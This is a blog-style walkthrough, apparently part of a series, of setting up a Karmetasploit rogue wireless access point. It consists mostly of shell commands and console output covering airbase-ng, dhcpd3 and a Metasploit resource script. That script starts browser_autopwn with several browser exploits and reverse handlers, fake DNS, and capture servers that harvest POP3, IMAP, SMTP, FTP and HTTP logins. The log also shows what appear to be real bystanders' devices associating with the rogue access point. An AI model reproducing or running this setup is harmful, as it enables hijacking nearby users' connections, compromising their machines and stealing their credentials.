19:56:03 00:14:06:11:42:A0 - channel: 4 - 'cheetahnetwork'
19:56:09 0/30: 0%

19:56:09 00:14:06:11:42:A1 - channel: 4 - 'Adult***Vegas'
19:56:15 0/30: 0%

Looks like we are good.

Now just follow the steps in the documentation. I installed dhcpd3 and set up my conf file, did a svn update on the metasploit trunk, made sure the sqlite3 stuff was working and then tweaked my karma.rc file for the IP address I was on. Pretty straightforward.

With all the config files set up it's pretty easy to get things going.

root@WPAD:/home/cg# airbase-ng -P -C 30 -v ath40
02:59:55 Created tap interface at0
02:59:55 Access Point with BSSID 00:19:7E:8E:72:87 started.
02:59:57 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
02:59:58 Got broadcast probe request from 00:14:A5:2E:BE:2F
02:59:59 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:02 Got broadcast probe request from 00:90:4B:C1:61:E4
03:00:03 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:05 Got broadcast probe request from 00:14:A5:48:CE:68
03:00:07 Got broadcast probe request from 00:90:4B:EA:54:01
03:00:09 Got directed probe request from 00:1B:63:EF:9F:EC - "delonte"
03:00:12 Got directed probe request from 00:13:E8:A8:B1:93 - "stayonline"
----snip------
03:01:34 Got an auth request from 00:21:06:41:CB:50 (open system)
03:01:34 Client 00:21:06:41:CB:50 associated (unencrypted) to ESSID: "tmobile"
03:04:19 Got an auth request from 00:1B:77:23:0A:72 (open system)
03:04:19 Client 00:1B:77:23:0A:72 associated (unencrypted) to ESSID: "LodgeNet
**You get the idea...


airbase-ng creates an at0 tap interface, so you have to configure it and set the MTU size (all this is from the karmetasploit documentation):

root@WPAD:/home/cg/evil/msf3# ifconfig at0 up 172.16.1.207 netmask 255.255.255.0

root@WPAD:/home/cg/evil/msf3# ifconfig at0 mtu 1400

root@WPAD:/home/cg/evil/msf3# ifconfig ath40 mtu 1800

After we get our IP stuff straight we need to tell the dhcpd server which interface to hand out IPs on.

root@WPAD:/home/cg/evil/msf3# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0

Internet Systems Consortium DHCP Server V3.0.5
Copyright 2004-2006 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 4 leases to leases file.
Listening on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on LPF/at0/00:19:7e:8e:72:87/172.16.1/24
Sending on Socket/fallback/fallback-net


After that we run our karma.rc file using msfconsole.

root@WPAD:/home/cg/evil/msf3# ./msfconsole -r karma.rc

=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux

resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 5353
SRVPORT => 5353
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> unset TARGETHOST
Unsetting TARGETHOST...
resource> set SRVPORT 53
SRVPORT => 53
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >


Next post we'll see karmetasploit in action.